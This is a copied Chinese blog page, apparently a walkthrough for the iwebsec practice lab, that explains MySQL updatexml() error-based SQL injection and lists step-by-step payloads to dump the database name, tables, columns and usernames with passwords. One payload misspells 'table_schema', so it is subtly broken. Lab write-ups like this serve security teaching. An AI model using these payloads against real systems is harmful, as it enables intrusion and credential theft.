当前位置: 首页 > news >正文

iwebsec-updatexml报错注入

news 2025/7/1 18:11:43

原理分析

Updatexml()函数“updatexml(XML_document, XPath_string, new_value);”

参数描述
XML_documentString格式,为XML文档对象的名称,文中为Doc
XPath_stringXpath格式的字符串
new_valueString格式,替换查找到的符合条件的数据

即sql语句为“select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1”
concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出用户
0x7eASCII码,实为~,upadtexml()报错信息为特殊字符、字母及之后的内容,为了前面字母丢失,开头连接一个特殊字符~

实战注入

1.判断是否存在漏洞,添加and 1=1# 页面正常回显,and 1=2# 页面回显异常,即存在sql注入漏洞

2.爆出数据库

id=1 and (updatexml(1,concat('~',(select database())),3))#

3.爆出表

id=1 and (updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schame=database())),3))#

4.爆出users表字段

id=1 and (updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')),3))#

5.爆数据

id=1 and (updatexml(1,concat('~',(select group_concat(username,',',password) from users)),3))#

 

http://www.dtcms.com/a/80847.html

相关文章:

  • Linux的I2C总线的原理和结构详解
  • ZMC600E,多核异构如何成就机器人精准控制?
  • CMS漏洞-DeDeCMS篇
  • Python数据可视化实战:从基础图表到高级分析
  • 基于springboot的房产销售系统(016)
  • Spring常用参数校验注解
  • 【MySQL】存储过程
  • 前端安全之DOMPurify基础使用
  • 如何理解分布式光纤传感器?
  • 二手Mac验机过程
  • 新一代电子数据取证专家 | 苏州龙信信息科技有限公司
  • 操作系统为ubantu的服务器上部署nginx软件基础步骤总结
  • 25.单例模式实现线程池
  • Ubuntu基础学习----指令
  • Qt 多线程设计:死循环与信号槽的权衡
  • 通过Knife4j在gateway中对swagger文档进行聚合
  • C# MVC项目部署II后错误,403禁止访问:访问被拒绝问题处理
  • pycharm常用快捷键
  • 2025-03-19 Unity 网络基础2——网络通信基础
  • vmware下linux无法上网解决方法
  • 游戏引擎学习第171天
  • Redis全面学习指南
  • 黑天鹅事件频发:2025年5种蒙特卡洛模拟工具压力测试
  • Elasticsearch Sql 查询
  • 深入理解 RLP 编码与 JSON:原理、应用与比较
  • ubuntu20.04安装完显卡驱动后黑屏问题
  • 【秣厉科技】LabVIEW工具包——OpenCV 教程(6):dnn实战之YOLO模型推理
  • 上线后bug常见问题及解决建议
  • CSS中height使用100%和100vh的区别
  • 百度BOS学习